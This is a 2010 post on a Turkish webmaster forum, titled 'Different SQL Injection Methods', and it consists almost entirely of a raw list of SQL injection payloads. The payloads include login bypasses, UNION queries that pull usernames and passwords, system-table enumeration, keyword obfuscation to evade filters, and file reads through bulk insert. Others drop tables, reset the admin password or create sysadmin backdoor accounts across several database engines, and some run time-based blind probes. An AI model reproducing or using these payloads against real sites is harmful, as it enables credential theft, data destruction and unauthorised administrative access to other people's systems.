Webmaster Araçları Kutsal Webmaster Bilgi Kaynağı |
|
Forum | Üye ol | Giriş Yap |
Forum >> Güvenlik Açıkları ve ipuçları >> Farklı Sql İnjection Yöntemleri |
Yazan | |
ahmet Yeni Üye | 03 Temmuz 2010 Cumartesi 09:53:44 ' and 1 in (select cast(x as varchar) from temp) -- ' union select * from msysobjects in 'c:\ <<< "access sql dosya okuma ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- burada select @@version fonksiyonunu encodeledik . ; declare @x varchar(80); set @x = 0x73656c65637420404076657273696f6e; EXEC (@x) '; EXEC ('SEL' + 'ECT US' + 'ER') ' and 1 in (select cast(x as varchar) from temp) -- ' and 1 in (select min(filename ) from master.dbo.sysdatabases where filename >'.' ) -- ' union select 0, sysobjects.name + ': ' + syscolumns.name + ': ' + systypes.name, 1, 1, '1', 1, 1, 1, 1, 1 from sysobjects, syscolumns, systypes where sysobjects.xtype = 'U' AND sysobjects.id = syscolumns.id AND syscolumns.xtype = systypes.xtype -- ; bulk insert tempdb..passwords from 'c:\temp\passwords.txt' uni'on sel'ect @@version-'- 'update users set password='password' where username='admin'--' ' update News set Title=min( char(80), char(83) ) -- yada ' update News set Title=char(80),char(70)-- ; insert into users values ( 0, char(0x31), char(0x34), 0xffff) << harfleri birleştiriyon yani char(85)=m char(88)=u char(90)=r gibi anladın ? ; bulk insert foo from 'c:\inetbub\wwwroot\login.asp' << guzel gibi. ; create table foo( line varchar(8000) ) ' drop table foo -- ' union select ret,1,1,1 from foo-- ' union select min(password) from users where username > 'a' -- ' union select min(username) from users where username > 'a' -- ; insert into users values ( 0, 'admin', 'r00tr0x!', 0xffff) << login sayfalarinda ' union select 1,username,password,4 -- <<< bunu giris sayfalarında yapabiliriz. 'or 1=1 -- ; drop table users-- << login sayfalarinda ' union select sum(username) from user-- >>>sayi fonksiyonu olabilir. ' and 1 in (select substring (x, 256, 256) from temp) -- ' and 1 in (select @@servername ) -- MS SQL exec sp_addlogin 'victor', 'Pass123' exec sp_addsrvrolemember 'victor', 'sysadmin' MySQL INSERT INTO mysql.user (user, host, password) VALUES ('victor', 'localhost', PASSWORD('Pass123')) Access CREATE USER victor IDENTIFIED BY 'Pass123' Postgres (requires UNIX account) CREATE USER victor WITH PASSWORD 'Pass123' Oracle CREATE USER victor IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; GRANT CONNECT TO victor; GRANT RESOURCE TO victor; MS Access; MsysACEs MsysObjects MsysQueries MsysRelationships ' and 1 in (select min(name ) from master.dbo.sysdatabases where name >'.' ) -- 'or'1'='1' UNI/**/ON SEL/**/ECT yada ; declare @x nvarchar(80); set @x = N'SEL' + N'ECT US' + N'ER'); EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' formusr = ' or 1=1 – – formpwd = anything Final query would look like this: SELECT * FROM users WHERE username = ' ' or 1=1 $formacct = 1 or 1=1 # $formpin = 1111 Final query would look like this: SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111 ' and 1 in (select 'text' ) - - union select if( condition , benchmark (100000, sha1('test')), 'false' ),1,1,1,1; ' and condition and '1'='1 Could be as simple as ' and '1' = '1 Or ' and '1' = '2 union select if( user() like 'root@%', benchmark(50000,sha1('test')), 'false' ); |
Hemen üye olmak için burayı tıklayınız.. | |
Sayfalar: 1 |